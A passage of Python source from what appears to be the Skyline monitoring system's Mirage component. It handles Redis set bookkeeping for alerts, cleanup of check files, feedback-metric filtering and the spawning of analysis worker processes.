skyline_app, 'ionosphere', timeseries_dir,
str(int_metric_timestamp), base_name, str(datapoint),
from_timestamp, triggered_algorithms, timeseries,
full_duration, str(ionosphere_parent_id),
# @added 20201001 - Task #3748: POC SNAB
# Added algorithms_run required to determine the anomalyScore
# so this needs to be sent to Ionosphere so Ionosphere
# can send it back on an alert
algorithms_run)
# @modified 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# Moved to the mirage.sent_to_ionosphere Redis set Redis set
# block below
# self.sent_to_ionosphere.append(base_name)
# @added 20200804 - Feature #3462: Add IONOSPHERE_MANAGE_PURGE
# Feature #3472: ionosphere.training_data Redis set
# Feature #3474: webapp api - training_data
# Add training data to the ionosphere.training_data so that
# the ionosphere purge_old_data_dirs can happen less
# frequently for reduced I/O
redis_set = 'ionosphere.training_data'
data = [base_name, int(int_metric_timestamp), second_order_resolution_seconds]
try:
logger.info('adding to Redis set %s - %s' % (
redis_set, str(data)))
self.redis_conn.sadd(redis_set, str(data))
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to add %s to %s Redis set' % (str(data), redis_set))
else:
logger.info('alert expiry key exists not sending to Ionosphere :: %s' % base_name)
# @added 20200904 - Feature #3734: waterfall alerts
# Remove the metric from the waterfall_alerts Redis set
# [metric, timestamp, value, added_to_waterfall_timestamp]
# waterfall_data = [metric[1], metric[2], metric[0], added_to_waterfall_timestamp, waterfall_panorama_data]
# Do not remove if this is only for training_data creation
if redis_metric_name in ionosphere_unique_metrics:
redis_set = 'analyzer.waterfall_alerts.sent_to_mirage'
mirage_waterfall_data = []
for waterfall_alert in analyzer_waterfall_alerts:
if waterfall_alert[0] == base_name:
if int(waterfall_alert[1]) == metric_timestamp:
mirage_waterfall_data = waterfall_alert
try:
self.redis_conn.srem(redis_set, str(waterfall_alert))
logger.info('removed waterfall alert item from Redis set %s - %s' % (
redis_set, str(waterfall_alert)))
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to remove waterfall alert item for %s at %s from Redis set %s' % (
base_name, str(metric_timestamp), redis_set))
# @added 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# Moved from the above self.sent_to_ionosphere
if not last_alert:
redis_set = 'mirage.sent_to_ionosphere'
data = str(base_name)
try:
self.redis_conn.sadd(redis_set, data)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to add %s to Redis set %s' % (
str(data), str(redis_set)))
# @added 20200904 - Feature #3734: waterfall alerts
# Add mirage waterfall alert
# Only add if this is an ionosphere_enabled metric_check_file
if redis_metric_name in ionosphere_unique_metrics:
if mirage_waterfall_data:
# waterfall_data = [metric[1], metric[2], metric[0], added_to_waterfall_timestamp, waterfall_panorama_data]
waterfall_data = mirage_waterfall_data
# @added 20201008 - Bug #3776: waterfall_alert - no analyzer triggered_algorithms in waterfall_panorama_data on MIRAGE_ALWAYS_METRICS
# When a MIRAGE_ALWAYS_METRICS on metric is sent
# through to Mirage from Analyzer the sometimes has
# no algorithms that triggered_algorithms as the
# metric is sent every run, this can be expected.
# However if the Mirage three-sigma check does
# trigger algorithms they need to be added here so
# that when metric and event are sent to Panorama
# the triggered_algorithms is populated
if base_name in MIRAGE_ALWAYS_METRICS:
from_timestamp = str(int(timeseries[1][0]))
waterfall_panorama_data = [
base_name, datapoint, int(timeseries[1][0]),
int(timeseries[-1][0]), algorithms_run,
triggered_algorithms, skyline_app,
skyline_app, this_host,
waterfall_alert[4][9]
]
# Use the original added_to_waterfall_timestamp
added_to_waterfall_timestamp = waterfall_data[3]
# @modified 20201009 - Bug #3776: waterfall_alert - no analyzer triggered_algorithms in waterfall_panorama_data on MIRAGE_ALWAYS_METRICS
# corrected datapoint, timestamp order
waterfall_data = [
base_name, int(timeseries[-1][0]), datapoint,
added_to_waterfall_timestamp, waterfall_panorama_data
]
redis_set = 'mirage.waterfall_alerts.sent_to_ionosphere'
try:
self.redis_conn.sadd(redis_set, str(waterfall_data))
logger.info('added to Redis set %s - %s' % (redis_set, str(waterfall_data)))
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to add %s to Redis set %s' % (
str(waterfall_data), str(redis_set)))
# Add values to the queue so the parent process can collate
for key, value in anomaly_breakdown.items():
self.mirage_anomaly_breakdown_q.put((key, value))
for key, value in exceptions.items():
self.mirage_exceptions_q.put((key, value))
metric_var_files = []
timeseries = []
if os.path.isfile(metric_check_file):
# Remove metric check file
try:
os.remove(metric_check_file)
logger.info('removed check file - %s' % metric_check_file)
except OSError:
logger.error('error :: failed to remove check file - %s' % metric_check_file)
pass
# Remove the metric directory
if os.path.exists(metric_data_dir):
try:
rmtree(metric_data_dir)
logger.info('removed data dir - %s' % metric_data_dir)
except:
logger.error('error :: failed to rmtree %s' % metric_data_dir)
# @added 20200723 - Feature #3472: ionosphere.training_data Redis set
# Feature #3566: custom_algorithms
# Optimize for MIRAGE_ALWAYS_METRICS which can create a lot
# of training_data dirs a Analyzer always hands them off to
# mirage.
remove_ionosphere_data_dir = False
if not anomalous:
if base_name in MIRAGE_ALWAYS_METRICS:
remove_ionosphere_data_dir = True
if not anomalous and periodic_mirage_check:
remove_ionosphere_data_dir = True
# @added 20190408 - Feature #2882: Mirage - periodic_check
# Remove the training_dir for mirage_periodic_check_metrics if not
# anomalous
# @modified 20200723 - Feature #3472: ionosphere.training_data Redis set
# Feature #3566: custom_algorithms
# if not anomalous and periodic_mirage_check:
if remove_ionosphere_data_dir:
timeseries_dir = base_name.replace('.', '/')
training_dir = '%s/%s/%s' % (
settings.IONOSPHERE_DATA_FOLDER, str(metric_timestamp),
str(timeseries_dir))
if os.path.exists(training_dir):
try:
rmtree(training_dir)
logger.info('removed Mirage always or periodic check training_data dir - %s' % training_dir)
except:
logger.error('error :: failed to rmtree Mirage always or periodic check training_dir - %s' % training_dir)
if not anomalous and periodic_mirage_check:
del mirage_periodic_check_metrics
def run(self):
"""
Called when the process intializes.
"""
# Log management to prevent overwriting
# Allow the bin/<skyline_app>.d to manage the log
if os.path.isfile(skyline_app_logwait):
try:
os.remove(skyline_app_logwait)
except OSError:
logger.error('error - failed to remove %s, continuing' % skyline_app_logwait)
pass
now = time()
log_wait_for = now + 5
while now < log_wait_for:
if os.path.isfile(skyline_app_loglock):
sleep(.1)
now = time()
else:
now = log_wait_for + 1
logger.info('starting %s run' % skyline_app)
if os.path.isfile(skyline_app_loglock):
logger.error('error - bin/%s.d log management seems to have failed, continuing' % skyline_app)
try:
os.remove(skyline_app_loglock)
logger.info('log lock file removed')
except OSError:
logger.error('error - failed to remove %s, continuing' % skyline_app_loglock)
pass
else:
logger.info('bin/%s.d log management done' % skyline_app)
# @modified 20210304 - Feature #3642: Anomaly type classification
# Feature #3970: custom_algorithm - adtk_level_shift
# Added triggered_algorithms
def smtp_trigger_alert(alert, metric, second_order_resolution_seconds, context, triggered_algorithms):
# Spawn processes
pids = []
spawned_pids = []
pid_count = 0
try:
# @modified 20210304 - Feature #3642: Anomaly type classification
# Feature #3970: custom_algorithm - adtk_level_shift
# Added triggered_algorithms
p = Process(target=self.spawn_alerter_process, args=(alert, metric, second_order_resolution_seconds, context, triggered_algorithms))
pids.append(p)
pid_count += 1
p.start()
spawned_pids.append(p.pid)
except:
logger.error('error :: failed to spawn_alerter_process')
logger.error(traceback.format_exc())
p_starts = time()
while time() - p_starts <= 15:
if any(p.is_alive() for p in pids):
# Just to avoid hogging the CPU
sleep(.1)
else:
# All the processes are done, break now.
break
else:
# We only enter this if we didn't 'break' above.
logger.info('%s :: timed out, killing the spawn_trigger_alert process' % (skyline_app))
for p in pids:
p.terminate()
# p.join()
for p in pids:
if p.is_alive():
logger.info('%s :: stopping spin_process - %s' % (skyline_app, str(p.is_alive())))
p.join()
"""
DEVELOPMENT ONLY
# @added 20160806 - Bug #1558: Memory leak in Analyzer
# Debug with garbage collection - http://code.activestate.com/recipes/65333/
"""
if ENABLE_MEMORY_PROFILING and garbage_collection_enabled:
# Debug with garbage collection - http://code.activestate.com/recipes/65333/
gc.enable()
gc.set_debug(gc.DEBUG_LEAK)
# As per http://stackoverflow.com/a/1641280
# This got useable understandable data with gc
before = defaultdict(int)
after = defaultdict(int)
for i in get_objects():
before[type(i)] += 1
if LOCAL_DEBUG:
logger.info('debug :: Memory usage in run at start: %s (kb)' % resource.getrusage(resource.RUSAGE_SELF).ru_maxrss)
# @added 20200903 - Task #3730: Validate Mirage running multiple processes
last_sent_to_graphite = int(time())
while 1:
now = time()
"""
DEVELOPMENT ONLY
# @added 20160806 - Bug #1558: Memory leak in Analyzer
# Debug with garbage collection - http://code.activestate.com/recipes/65333/
"""
if ENABLE_MEMORY_PROFILING and garbage_collection_enabled:
# As per http://stackoverflow.com/a/1641280
# This got useable understandable data with gc
before = defaultdict(int)
after = defaultdict(int)
for i in get_objects():
before[type(i)] += 1
if LOCAL_DEBUG:
logger.info('debug :: Memory usage before looking for checks: %s (kb)' % resource.getrusage(resource.RUSAGE_SELF).ru_maxrss)
# Make sure Redis is up
try:
self.redis_conn.ping()
except:
logger.info('skyline can not connect to redis at socket path %s' % settings.REDIS_SOCKET_PATH)
sleep(10)
logger.info('connecting to redis at socket path %s' % settings.REDIS_SOCKET_PATH)
# @modified 20180519 - Feature #2378: Add redis auth to Skyline and rebrow
# @modified 20191113 - Bug #3266: py3 Redis binary objects not strings
# Branch #3262: py3
# if settings.REDIS_PASSWORD:
# self.redis_conn = StrictRedis(password=settings.REDIS_PASSWORD, unix_socket_path=settings.REDIS_SOCKET_PATH)
# else:
# self.redis_conn = StrictRedis(unix_socket_path=settings.REDIS_SOCKET_PATH)
try:
self.redis_conn = get_redis_conn(skyline_app)
self.redis_conn_decoded = get_redis_conn_decoded(skyline_app)
except:
logger.info('falied to connect to Redis')
if self.redis_conn.ping():
logger.info('connected to redis')
continue
"""
Determine if any metric to analyze or Ionosphere alerts to be sent
"""
while True:
# Report app up
# @modified 20210524 - Branch #1444: thunder
# Report app AND Redis as up
# self.redis_conn.setex(skyline_app, 120, now)
try:
redis_is_up = self.redis_conn.setex(skyline_app, 120, now)
if redis_is_up:
try:
self.redis_conn.setex('redis', 120, now)
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: could not update the Redis redis key - %s' % (
e))
except Exception as e:
logger.error('error :: failed to update Redis key for %s up - %s' % (skyline_app, e))
# @added 20200604 - Mirage - populate_redis
# This functionality enables Mirage to populate the Skyline
# Redis instance with FULL_DURATION data from Graphite if
# Analyzer flags the time series as TooShort and adds it too the
# mirage.populate_redis Redis set. Or possibly if there are
# airgaps in the Redis data due to a network partition. It will
# fill a metric about every 10 seconds or so, unless there are
# Mirage checks or ionosphere_alerts to send
populate_redis_with_metrics = []
if MIRAGE_AUTOFILL_TOOSHORT:
try:
populate_redis_with_metrics = list(self.redis_conn_decoded.smembers('mirage.populate_redis'))
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to get Redis set mirage.populate_redis')
populate_redis_with_metrics = []
metric_to_populate_redis = None
populate_redis_with_metrics_count = 0
if populate_redis_with_metrics:
populate_redis_with_metrics_count = len(populate_redis_with_metrics)
logger.info('%s metrics found in mirage.populate_redis Redis set' % str(populate_redis_with_metrics_count))
try:
metric_to_populate_redis = str(populate_redis_with_metrics[0])
try:
del populate_redis_with_metrics
except:
pass
logger.info('processing %s from mirage.populate_redis Redis set' % metric_to_populate_redis)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to determine metric to populate_redis')
metric_to_populate_redis = None
if metric_to_populate_redis:
try:
# Spawn a populate_redis processes
pids = []
spawned_pids = []
p = Process(target=self.populate_redis, args=(1, metric_to_populate_redis))
pids.append(p)
logger.info('starting populate_redis process')
p.start()
spawned_pids.append(p.pid)
p_starts = time()
while time() - p_starts <= 10:
if any(p.is_alive() for p in pids):
# Just to avoid hogging the CPU
sleep(.1)
else:
# All the processes are done, break now.
time_to_run = time() - p_starts
logger.info('populate_redis process completed in %.2f seconds' % (
time_to_run))
break
else:
# We only enter this if we didn't 'break' above.
logger.info('timed out, killing populate_redis process')
for p in pids:
p.terminate()
# p.join()
for p in pids:
if p.is_alive():
logger.info('stopping populate_redis process - %s' % (str(p.is_alive())))
p.join()
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to spawn populate_redis process')
# @added 20161228 - Feature #1828: ionosphere - mirage Redis data features
# If Ionosphere is going to pass alerts back to the app
# here we are going to have break out and force a alerting
# only run.
ionosphere_alerts = None
ionosphere_alerts_returned = False
metric_var_files = [f for f in listdir(settings.MIRAGE_CHECK_PATH) if isfile(join(settings.MIRAGE_CHECK_PATH, f))]
# @modified 20190408 - Bug #2904: Initial Ionosphere echo load and Ionosphere feedback
# Feature #2484: FULL_DURATION feature profiles
# Do not pospone the Ionosphere alerts check on based on whether
# there are checks on not
# if len(metric_var_files) == 0:
if not ionosphere_alerts_returned:
# @modified 20161228 - Feature #1830: Ionosphere alerts
try:
# @modified 20200430 - Bug #3266: py3 Redis binary objects not strings
# Branch #3262: py3
# ionosphere_alerts = list(self.redis_conn.scan_iter(match='ionosphere.mirage.alert.*'))
ionosphere_alerts = list(self.redis_conn_decoded.scan_iter(match='ionosphere.mirage.alert.*'))
ionosphere_alerts_returned = True
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to scan ionosphere.mirage.alert.* from Redis')
ionosphere_alerts = []
if len(ionosphere_alerts) == 0:
ionosphere_alerts_returned = False
else:
logger.info('Ionosphere alert requested :: %s' % str(ionosphere_alerts))
# @modified 20190408 - Bug #2904: Initial Ionosphere echo load and Ionosphere feedback
# Feature #2484: FULL_DURATION feature profiles
# Do not pospone the Ionosphere alerts check
# if not ionosphere_alerts_returned:
# logger.info('sleeping no metrics...')
# sleep(10)
# @added 20191106 - Branch #3262: py3
if os.path.isfile(alert_test_file):
test_alert = None
try:
with open((alert_test_file), 'r') as fh:
raw_test_alert = fh.read()
test_alert = literal_eval(raw_test_alert)
# [metric, alerter]
# e.g. ['server-1.cpu.user', 'smtp']
# e.g. ['server-1.cpu.user', 'slack']
# e.g. ['skyline_test.alerters.test', 'smtp']
except:
logger.error(traceback.format_exc())
logger.error('error :: could not evaluate test_alert from %s' % alert_test_file)
if test_alert:
try:
logger.info('test alert metric found - alerting on %s' % str((test_alert)))
metric_name = str(test_alert[0])
test_alerter = str(test_alert[1])
metric = (1, metric_name, int(time()))
alert = (metric_name, test_alerter, 10)
# @added 20210304 - Feature #3642: Anomaly type classification
# Feature #3970: custom_algorithm - adtk_level_shift
triggered_algorithms = ['testing']
if settings.SLACK_ENABLED and test_alerter == 'slack':
logger.info('test alert to slack for %s' % (metric_name))
# @modified 20210304 - Feature #3642: Anomaly type classification
# Feature #3970: custom_algorithm - adtk_level_shift
# Added triggered_algorithms
trigger_alert(alert, metric, 604800, skyline_app, triggered_algorithms)
if test_alerter == 'smtp':
# @modified 20210304 - Feature #3642: Anomaly type classification
# Feature #3970: custom_algorithm - adtk_level_shift
# Added triggered_algorithms
smtp_trigger_alert(alert, metric, 604800, skyline_app, triggered_algorithms)
except:
logger.error('error :: test trigger_alert - %s' % traceback.format_exc())
logger.error('error :: failed to test trigger_alert :: %s' % metric_name)
try:
os.remove(alert_test_file)
except OSError:
logger.error('error - failed to remove %s, continuing' % alert_test_file)
pass
# @modified 20190408 - Bug #2904: Initial Ionosphere echo load and Ionosphere feedback
# Feature #2484: FULL_DURATION feature profiles
# Move this len(metric_var_files) from above and apply the
# appropriatte sleep
if len(metric_var_files) == 0:
if not ionosphere_alerts_returned:
# @modified 20200604 - Mirage - populate_redis
# Do not sleep if there are metrics to populate in Redis
if populate_redis_with_metrics_count == 0:
# @added 20200903 - Task #3730: Validate Mirage running multiple processes
sleep_for = 10
next_send_to_graphite = last_sent_to_graphite + 60
seconds_to_next_send_to_graphite = next_send_to_graphite - int(time())
if seconds_to_next_send_to_graphite < 10:
if seconds_to_next_send_to_graphite > 1:
sleep_for = seconds_to_next_send_to_graphite
else:
break
logger.info('sleeping no metrics...')
# @modified 20200903 - Task #3730: Validate Mirage running multiple processes
# sleep(10)
sleep(sleep_for)
else:
logger.info('no checks or alerts, continuing to process populate_redis metrics')
# @modified 20200903 - Task #3730: Validate Mirage running multiple processes
# Removed sleep, no delay
# else:
# sleep(1)
# Clean up old files
now_timestamp = time()
stale_age = now_timestamp - settings.MIRAGE_STALE_SECONDS
for current_file in listdir(settings.MIRAGE_CHECK_PATH):
if os.path.isfile(settings.MIRAGE_CHECK_PATH + "/" + current_file):
t = os.stat(settings.MIRAGE_CHECK_PATH + "/" + current_file)
c = t.st_ctime
# delete file if older than a week
if c < stale_age:
os.remove(settings.MIRAGE_CHECK_PATH + "/" + current_file)
logger.info('removed stale check - %s' % (current_file))
# @added 20200903 - Task #3730: Validate Mirage running multiple processes
redis_set = 'mirage.stale_check_discarded'
try:
self.redis_conn.sadd(redis_set, str(current_file))
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to add %s to Redis set %s' % (
str(current_file), str(redis_set)))
# @added 20201026 - Task #3800: Handle feedback metrics in Mirage and waterfall alerts
# Handle feedback metrics in a similar style to Ionosphere
# Do not run checks if namespace has matched multiple times in
# the last 10 minutes.
if len(metric_var_files) > 3:
analyzer_waterfall_alerts = []
feedback_metric_loop_error_logged = False
for current_file in listdir(settings.MIRAGE_CHECK_PATH):
feedback_metric = False
remove_feedback_metric_check = False
remove_alerted_on_metric_check = False
try:
current_file_no_extension = current_file.replace('.txt', '')
current_file_no_extension_elements = current_file_no_extension.split('.')
base_name = '.'.join(current_file_no_extension_elements[1:])
metric_timestamp = int(current_file_no_extension_elements[0])
except:
pass
try:
metric_namespace_elements = base_name.split('.')
for to_skip in SKYLINE_FEEDBACK_NAMESPACES:
if to_skip in base_name:
feedback_metric = True
break
to_skip_namespace_elements = to_skip.split('.')
elements_matched = set(metric_namespace_elements) & set(to_skip_namespace_elements)
if len(elements_matched) == len(to_skip_namespace_elements):
feedback_metric = True
break
feedback_cache_key_exists = False
feedback_cache_key = 'mirage.feedback_metric.checked.%s' % (base_name)
feedback_metric_process_time = int(time())
if feedback_metric:
try:
feedback_cache_key_exists = self.redis_conn_decoded.get(feedback_cache_key)
except:
logger.info(traceback.format_exc())
logger.error('error :: failed to get %s key from Redis' % (
str(feedback_cache_key)))
if feedback_cache_key_exists:
feedback_metric_last_processed_seconds_ago = feedback_metric_process_time - int(feedback_cache_key_exists)
logger.info('feedback metric identified as last processed %s seconds ago via Redis key %s' % (
str(feedback_metric_last_processed_seconds_ago), feedback_cache_key))
remove_feedback_metric_check = True
# @added 20210505 - Bug #4048: Mirage - removing feedback metrics to be processed
feedback_processed_cache_key = 'mirage.feedback_metric.processed.%s' % (base_name)
feedback_processed_cache_key_exists = None
try:
feedback_processed_cache_key_exists = self.redis_conn_decoded.get(feedback_processed_cache_key)
except Exception as e:
logger.error('error :: failed to get %s key from Redis - %s' % (
str(feedback_processed_cache_key), e))
if not feedback_processed_cache_key_exists:
remove_feedback_metric_check = False
logger.info('feedback metric Redis key %s does not exist, not removing metric' % feedback_processed_cache_key)
if len(metric_var_files) > 10 and not feedback_cache_key_exists:
logger.info('Mirage is busy removing feedback metric check')
remove_feedback_metric_check = True
# @modified 20201128 - Feature #3734: waterfall alerts
# Only add if does not exist and always add
# else:
# try:
# self.redis_conn.setex(feedback_cache_key, 600, feedback_metric_process_time)
# if not feedback_cache_key_exists:
if not feedback_cache_key_exists and not remove_feedback_metric_check:
logger.info('feedback metric identified as not processed in last 600 seconds adding Redis key with 600 TTL and processing - %s' % feedback_cache_key)
try:
self.redis_conn.setex(feedback_cache_key, 600, feedback_metric_process_time)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to add %s key to Redis' % (
str(feedback_cache_key)))
except:
if not feedback_metric_loop_error_logged:
logger.error(traceback.format_exc())
logger.error('error :: failed to check feedback and alerted on metrics')
feedback_metric_loop_error_logged = True
# Remove checks that have been alerted on by Mirage or
# via an Analyzer waterfall alert
if len(metric_var_files) > 10 and not remove_feedback_metric_check:
cache_key = 'mirage.last_alert.smtp.%s' % (base_name)
alerted_on = False
try:
alerted_on = self.redis_conn_decoded.get(cache_key)
except Exception as e:
logger.error('error :: could not query Redis for cache_key: %s' % str(e))
if not alerted_on:
# Check for Analyzer alert key from waterfall alert
cache_key = 'last_alert.smtp.%s' % (base_name)
try:
alerted_on = self.redis_conn_decoded.get(cache_key)
except Exception as e:
logger.error('error :: could not query Redis for cache_key: %s' % str(e))
if alerted_on:
remove_alerted_on_metric_check = True
# Unless is it older than PANORAMA_EXPIRY_TIME
try:
alerted_on_at = int(alerted_on)
alerted_on_seconds_ago = int(time()) - alerted_on_at
if alerted_on_seconds_ago >= settings.PANORAMA_EXPIRY_TIME:
remove_alerted_on_metric_check = False
except:
remove_alerted_on_metric_check = True
pass
if remove_feedback_metric_check or remove_alerted_on_metric_check:
if remove_feedback_metric_check:
log_str = 'feedback metric'
if remove_alerted_on_metric_check:
log_str = 'alerted on metric'
logger.info('removing %s %s check file and from analyzer.waterfall_alerts.sent_to_mirage Redis set' % (
log_str, base_name))
try:
os.remove(settings.MIRAGE_CHECK_PATH + "/" + current_file)
except:
logger.error('error :: failed to remove %s %s check file - %s' % (
log_str, base_name, current_file))
# Remove the metric from the waterfall_alerts Redis set
# waterfall_data = [metric[1], metric[2], metric[0], added_to_waterfall_timestamp. waterfall_panorama_data]
if not analyzer_waterfall_alerts:
redis_set = 'analyzer.waterfall_alerts.sent_to_mirage'
literal_analyzer_waterfall_alerts = []
try:
literal_analyzer_waterfall_alerts = list(self.redis_conn_decoded.smembers(redis_set))
except:
literal_analyzer_waterfall_alerts = []
analyzer_waterfall_alerts = []
for literal_waterfall_alert in literal_analyzer_waterfall_alerts:
waterfall_alert = literal_eval(literal_waterfall_alert)
analyzer_waterfall_alerts.append(waterfall_alert)
for waterfall_alert in analyzer_waterfall_alerts:
if waterfall_alert[0] == base_name:
if int(waterfall_alert[1]) == metric_timestamp:
try:
self.redis_conn.srem(redis_set, str(waterfall_alert))
logger.info('removed waterfall alert item for %s from Redis set %s - %s' % (
log_str, redis_set, str(waterfall_alert)))
# @modified 20201128 - Feature #3734: waterfall alerts
# Do not break, check and remove
# waterfall_alert items with older
# timestamps as well
# break
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to remove waterfall alert item for %s %s at %s from Redis set %s' % (
log_str, base_name, str(metric_timestamp), redis_set))
# @added 20201128 - Feature #3734: waterfall alerts
# If the check just done is new than an existing analyzer
# waterfall alert metric timestamp remove those keys as well
if int(waterfall_alert[1]) < metric_timestamp:
try:
self.redis_conn.srem(redis_set, str(waterfall_alert))
logger.info('removed waterfall alert item with older timestamp for %s from Redis set %s - %s' % (
log_str, redis_set, str(waterfall_alert)))
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to remove waterfall alert item for %s %s at %s from Redis set %s' % (
log_str, base_name, str(metric_timestamp), redis_set))
# Discover metric to analyze
metric_var_files = ''
# @added 20161228 - Feature #1830: Ionosphere alerts
# Prioritises Ionosphere alerts
if ionosphere_alerts_returned:
break
metric_var_files = [f for f in listdir(settings.MIRAGE_CHECK_PATH) if isfile(join(settings.MIRAGE_CHECK_PATH, f))]
if len(metric_var_files) > 0:
break
process_metric_check_files = False
# @modified 20161228 - Feature #1830: Ionosphere alerts
# Only spawn process if this is not an Ionosphere alert
if not ionosphere_alerts_returned:
metric_var_files_sorted = sorted(metric_var_files)
# metric_check_file = settings.MIRAGE_CHECK_PATH + "/" + metric_var_files_sorted[0]
if metric_var_files_sorted:
process_metric_check_files = True
if process_metric_check_files:
# @added 20200903 - Task #3730: Validate Mirage running multiple processes
check_files_to_process = len(metric_var_files_sorted)
logger.info('%s checks to process' % str(check_files_to_process))
# Remove any existing algorithm.error files from any previous runs
# that did not cleanup for any reason
pattern = '%s.*.algorithm.error' % skyline_app
try:
for f in os.listdir(settings.SKYLINE_TMP_DIR):
if re.search(pattern, f):
try:
os.remove(os.path.join(settings.SKYLINE_TMP_DIR, f))
logger.info('cleaning up old error file - %s' % (str(f)))
except OSError:
pass
except:
logger.error('failed to cleanup mirage_algorithm.error files - %s' % (traceback.format_exc()))
# Spawn processes
pids = []
spawned_pids = []
pid_count = 0
# @modified 20200903 - Task #3730: Validate Mirage running multiple processes
# MIRAGE_PROCESSES = 1
if len(metric_var_files) > 1:
try:
MIRAGE_PROCESSES = int(settings.MIRAGE_PROCESSES)
if len(metric_var_files) < MIRAGE_PROCESSES:
MIRAGE_PROCESSES = len(metric_var_files)
except:
MIRAGE_PROCESSES = 1
else:
MIRAGE_PROCESSES = 1
# @modified 20200903 - Task #3730: Validate Mirage running multiple processes
# processing_check_file = metric_var_files_sorted[0]
# logger.info('processing %s' % processing_check_file)
# @modified 20200909 - Task #3730: Validate Mirage running multiple processes
# for i in range(1, MIRAGE_PROCESSES + 1):
# up_to = i - 1
# processing_check_file = metric_var_files_sorted[up_to]
# logger.info('processing %s' % processing_check_file)
# @modified 20161224 - send mirage metrics to graphite
# run_timestamp = int(now)
run_timestamp = int(time())
for i in range(1, MIRAGE_PROCESSES + 1):
# @added 20200909 - Task #3730: Validate Mirage running multiple processes
up_to = i - 1
processing_check_file = metric_var_files_sorted[up_to]
logger.info('processing %s' % processing_check_file)
# @modified 20200909 - Task #3730: Validate Mirage running multiple processes
# p = Process(target=self.spin_process, args=(i, run_timestamp, metric_var_files_sorted))
p = Process(target=self.spin_process, args=(i, run_timestamp, processing_check_file))
pids.append(p)
pid_count += 1
logger.info('starting %s of %s spin_process/es' % (str(pid_count), str(MIRAGE_PROCESSES)))
p.start()
# @modified 20200903 - Task #3730: Validate Mirage running multiple processes
# spawned_pids.append(p.pid)
spawned_pids.append([p.pid, i])
logger.info('started spin_process %s with pid %s' % (str(pid_count), str(p.pid)))
# Send wait signal to zombie processes
# for p in pids:
# p.join()
# Self monitor processes and terminate if any spin_process has run
# for longer than 180 seconds - 20160512 @earthgecko
p_starts = time()
while time() - p_starts <= settings.MAX_ANALYZER_PROCESS_RUNTIME:
if any(p.is_alive() for p in pids):
# Just to avoid hogging the CPU
sleep(.1)
else:
# All the processes are done, break now.
time_to_run = time() - p_starts
logger.info('%s :: %s spin_process/es completed in %.2f seconds' % (
skyline_app, str(MIRAGE_PROCESSES), time_to_run))
break
else:
# We only enter this if we didn't 'break' above.
logger.info('%s :: timed out, killing all spin_process processes' % (skyline_app))
for p in pids:
p.terminate()
# p.join()
for p in pids:
if p.is_alive():
logger.info('%s :: stopping spin_process - %s' % (skyline_app, str(p.is_alive())))
p.join()
# @added 20200607 - Feature #3508: ionosphere.untrainable_metrics
# Check to non 3sigma algorithm errors too
if LOCAL_DEBUG:
logger.debug('debug :: adding negatives_present to check_algorithm_errors')
check_algorithm_errors = ['negatives_present']
for algorithm in list(settings.MIRAGE_ALGORITHMS):
if LOCAL_DEBUG or DEBUG_CUSTOM_ALGORITHMS:
logger.debug('debug :: adding %s to check_algorithm_errors' % (algorithm))
check_algorithm_errors.append(algorithm)
# @added 20200607 - Feature #3566: custom_algorithms
if CUSTOM_ALGORITHMS:
for custom_algorithm in settings.CUSTOM_ALGORITHMS:
if LOCAL_DEBUG or DEBUG_CUSTOM_ALGORITHMS:
logger.debug('debug :: adding custom_algorithm %s to check_algorithm_errors' % (custom_algorithm))
check_algorithm_errors.append(custom_algorithm)
if LOCAL_DEBUG or DEBUG_CUSTOM_ALGORITHMS:
logger.debug('debug :: checking for algorithm error files')
# @modified 20200903 - Task #3730: Validate Mirage running multiple processes
# for completed_pid in spawned_pids:
for completed_pid, mirage_process in spawned_pids:
logger.info('spin_process with pid %s completed' % (str(completed_pid)))
# @modified 20200607 - Feature #3566: custom_algorithms
# Feature #3508: ionosphere.untrainable_metrics
# Check to non 3sigma algorithm errors too and wrapped in try
try:
# for algorithm in settings.MIRAGE_ALGORITHMS:
for algorithm in check_algorithm_errors:
algorithm_error_file = '%s/%s.%s.%s.algorithm.error' % (
settings.SKYLINE_TMP_DIR, skyline_app,
str(completed_pid), algorithm)
if os.path.isfile(algorithm_error_file):
logger.info(
'error :: spin_process with pid %s has reported an error with the %s algorithm' % (
str(completed_pid), algorithm))
try:
with open(algorithm_error_file, 'r') as f:
error_string = f.read()
logger.error('%s' % str(error_string))
except:
logger.error('error :: failed to read %s error file' % algorithm)
try:
os.remove(algorithm_error_file)
except OSError:
pass
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to check algorithm errors')
if LOCAL_DEBUG or DEBUG_CUSTOM_ALGORITHMS:
logger.debug('debug :: checked for algorithm error files')
# Grab data from the queue and populate dictionaries
exceptions = dict()
anomaly_breakdown = dict()
while 1:
try:
key, value = self.mirage_anomaly_breakdown_q.get_nowait()
if key not in anomaly_breakdown.keys():
anomaly_breakdown[key] = value
else:
anomaly_breakdown[key] += value
except Empty:
# @added 20191113 - Branch #3262: py3
# Log
logger.info('anomaly_breakdown.keys are empty')
break
while 1:
try:
key, value = self.mirage_exceptions_q.get_nowait()
if key not in exceptions.keys():
exceptions[key] = value
else:
exceptions[key] += value
except Empty:
# @added 20191113 - Branch #3262: py3
# Log
logger.info('exceptions.keys are empty')
break
# @added 20191021 - Bug #3288: Always send anomaly_breakdown and exception metrics
# Branch #3262: py3
exceptions_metrics = ['Boring', 'Stale', 'TooShort', 'Other']
for i_exception in exceptions_metrics:
if i_exception not in exceptions.keys():
exceptions[i_exception] = 0
# @modified 20200607 - Feature #3566: custom_algorithms
# for i_anomaly_breakdown in settings.MIRAGE_ALGORITHMS:
for i_anomaly_breakdown in check_algorithm_errors:
if i_anomaly_breakdown not in anomaly_breakdown.keys():
anomaly_breakdown[i_anomaly_breakdown] = 0
# @added 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# Use Redis set and not self.metric_variables
metric_variables = []
# @modified 20191022 - Bug #3266: py3 Redis binary objects not strings
